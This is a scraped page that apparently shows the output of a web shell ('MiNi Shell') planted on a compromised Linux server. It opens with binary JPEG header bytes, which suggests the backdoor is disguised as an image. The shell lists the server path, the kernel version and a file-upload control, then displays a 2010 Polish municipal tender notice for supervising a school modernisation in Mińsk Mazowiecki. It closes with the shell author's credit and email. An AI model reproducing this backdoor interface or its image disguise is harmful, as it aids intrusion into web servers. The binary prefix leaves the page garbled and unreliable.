JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100119/15648-N-2010.html

<p class="kh_header"><b>Mińsk Mazowiecki: Pełnienie nadzoru inwestorskiego we wszystkich branżach nad wykonaniem robót związanych z rozbudową  i modernizacją Szkoły Podstawowej nr 1 i Gimnazjum Miejskiego Nr 1 przy ul. Kopernika 9 w Mińsku Mazowieckim.</b><br>
<b>Numer ogłoszenia: 15648 - 2010; data zamieszczenia: 19.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Mińsk Mazowiecki , ul. Konstytucji 3-go Maja 1, 05-300 Mińsk Mazowiecki, woj. mazowieckie, tel. 025 7595300, faks 025 758 40 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.minsk-maz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego we wszystkich branżach nad wykonaniem robót związanych z rozbudową  i modernizacją Szkoły Podstawowej nr 1 i Gimnazjum Miejskiego Nr 1 przy ul. Kopernika 9 w Mińsku Mazowieckim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi polegającej na pełnieniu nadzoru inwestorskiego we wszystkich branżach budowlanych nad wykonaniem robót związanych z rozbudową  i modernizacją Szkoły Podstawowej nr 1 i Gimnazjum Miejskiego Nr 1 przy ul. Kopernika 9 w Mińsku Mazowieckim.

Zakres robót budowlanych przewiduje następujące rodzaje robót: 
- wyburzenia / demontaże - dotyczące istniejącego, parterowego, nie podpiwniczonego łącznika pomiędzy starą szkołą i istniejącą salą gimnastyczną oraz pozostałej części budynku istniejącego (stara szkoła);
- roboty remontowe - dotyczące istniejącego budynku szkoły;
- budowę nowego budynku, boiska, bieżni i zagospodarowanie terenu - dotyczącą nowo wybudowanych obiektów. 
W ramach budowy nowego budynku, boiska, bieżni oraz zagospodarowania terenu  należy wykonać: 
- roboty instalacyjne przebudowę istniejących przyłączy i sieci, budowa nowych przyłączy, odwodnienie terenu - wg projektu zagospodarowania terenu i projektów instalacji sanitarnych i elektrycznych;
- budowę boiska z nawierzchnią syntetyczną (płyta boiska o wymiarach  23, m x 45,0 m, łączna powierzchnia 1035,0 m2), przeznaczoną do stosowania na boiska wielofunkcyjne (na nawierzchni syntetycznej wymalowane zostaną linie boiska do gry w piłkę ręczną 40,0 x 20,0 m, mini piłkę nożną 40,0 m x oraz kort tenisowy o wym. 23,77 x 10,97 m i bieżni (3 torowej o szerokości 117,0 cm każdy tor, łączna szerokość bieżni 3,71 m, długość 73,15 m) ze skrzynią do skoku w dal (o wymiarach 7,0 x 3,71 m, wypełniona piaskiem, warstwą 
o grubości 40,0 cm);
- budowę chodników, drogi dojazdowej, ukształtowanie terenu, budowę obiektów małej architektury. 
Do zadań Wykonawcy należy przygotowanie wszelkich dokumentów niezbędnych do uzyskania prawa inwestora na użytkowanie obiektu, zgodnie z opracowaną dokumentacją projektową i pozwoleniem na budowę obiektu, będącymi w posiadaniu Zamawiającego.
Wszelkie roboty budowlane należy wykonać zgodnie z dokumentacją projektową i Specyfikacjami Technicznymi Wykonania i Odbioru Robót, w zakresie określonym w przedmiarach robót w ramach specyfikacji istotnych warunków zamówienia.

Roboty wykonywane będą na podstawie następujących dokumentacji projektowych, stanowiących integralną część niniejszej umowy:
1) Projekt wykonawczy - zagospodarowania terenu + architektura - tom I;
2) Projekt wykonawczy - konstrukcja;
3) Projekt wykonawczy - instalacja wod - kan;
4) Projekt wykonawczy - centralnego ogrzewania i  ciepła technologicznego;
5) Projekt wykonawczy - instalacja wentylacji mechanicznej;
6) Projekt wykonawczy - instalacja wewnętrzna gazu;
7) Projekt wykonawczy - instalacje eklektyczne - tom IV;
8) Projekt wykonawczy - instalacja niskoprądowe;
9) Projekt wykonawczy - przyłącze gazu;
10) Projekt wykonawczy - technologia + automatyka węzła cieplnego;
11) Projekt wykonawczy - instalacje elektryczne węzła cieplnego;
12) Projekt wykonawczy - przyłącze wody i kanalizacji oraz odwodnienie terenu;
13) Projekt wykonawczy - drogi i ukształtowanie terenu;
14) Projekt wykonawczy - technologia kuchni;
15) Inwentaryzacja dendrologiczna i projekt gospodarki drzewostanem;

- rozruchu obiektu łącznie z uzyskaniem decyzji zezwalającej na użytkowanie obiektu, zgodnie z opracowaną dokumentacją projektową i pozwoleniem na budowę obiektu, będącymi w posiadaniu Zamawiającego. 

Nadzór winien obejmować wszystkie czynności wymagane przepisami prawa budowlanego, 
a w szczególności prawidłowości prowadzonych i wykonywanych robót w stosunku do dokumentacji budowlanej, sztuki budowlanej, zastosowanych materiałów i ich jakości, przepisów BHP i p.poż oraz odbiorów robót, ich rozliczania i fakturowania. Szczegółowy zakres obowiązków inspektora nadzoru wynika z treści wzoru, którą Zleceniodawca zawarł z wybranym w drodze przetargu nieograniczonego Wykonawcą robót budowlanych (załącznik nr 3 do niniejszej specyfikacji)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wniesienie wadium nie będzie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki zawarte w art.22.1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655, z 2008 r. Nr 171, poz. 1058, Nr 220, poz. 1420 i Nr 227, poz. 1505 oraz z 2009 r. Nr 19, poz. 101, Nr 65, poz. 545, Nr 91, poz. 742, Nr 157, poz. 1241, Nr 206, poz. 1591):
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. - nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655, z 2008 r. Nr 171, poz. 1058, Nr 220, poz. 1420 i Nr 227, poz. 1505 oraz z 2009 r. Nr 19, poz. 101, Nr 65, poz. 545, Nr 91, poz. 742, Nr 157, poz. 1241, Nr 206, poz. 1591)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający żąda od wykonawców dokumentów, potwierdzających spełnianie warunków udziału w postępowaniu:
1) wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług - nadzorów inwestorskich w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom, stanowiącym przedmiot zamówienia (nadzór inwestorski co najmniej nad 1 obiektem użyteczności publicznej), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie;
2)	akceptacji istotnych dla zamawiającego postanowień, które zostaną wprowadzone do treści zawieranej umowy;
3) wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności 
3a) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5, wykonawca wskazał osoby, którymi będzie dysponował;
4) dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (należy załączyć kopie uprawnień oraz wymagane dokumenty potwierdzające przynależność do właściwej Izby w danej branży i ubezpieczenie OC);
5) aktualnego wypisu/odpisu z właściwego rejestru KRS lub zaświadczenie o wpisie do ewidencji do ewidencji działalności gospodarczej (wystawiony nie wcześniej niż 6 miesięcy przed terminem składania ofert);
6)  pełnomocnictwa do występowania w imieniu podmiotów występujących wspólnie 
7) aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust.1 pkt 4 - 9 ustawy o zamówieniach publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
8) oświadczenia (lub zaświadczenia), że wykonawca nie zalega z opłacaniem w urzędzie skarbowym podatków, opłat lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
9) oświadczenie (lub zaświadczenie), że oferent nie zalega z opłacaniem w Zakładzie Ubezpieczeń Społecznych składek na ubezpieczenia zdrowotne lub społeczne  lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawione nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert;
10) dane dotyczące podwykonawców, zakres  jaki wykonawca zamierza im zlecić;
11) aktualną polisę ubezpieczeniową lub inny dokument ubezpieczenia potwierdzający, że oferent jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku wykonawcy zobowiązani są ustanowić pełnomocnika do reprezentowania ich w prowadzonym postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Każdy z wykonawców musi spełniać wymagania określone dla wykonawcy.
Jeżeli oferta wykonawców, została wybrana, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców.

Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia, oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków 
o dopuszczenie do udziału w postępowaniu albo termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.minskmaz.bip-gov.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Mińsk Mazowiecki, 05-300 Mińsk Mazowiecki, ul. Konstytucji 3 Maja 1, nr pokoju 212.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2010 godzina 10:00, miejsce: Urząd Miasta Mińsk Mazowiecki, 05-300 Mińsk Mazowiecki, ul. Konstytucji 3 Maja 1, pok. nr 5 (biuro obsługi interesanta)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com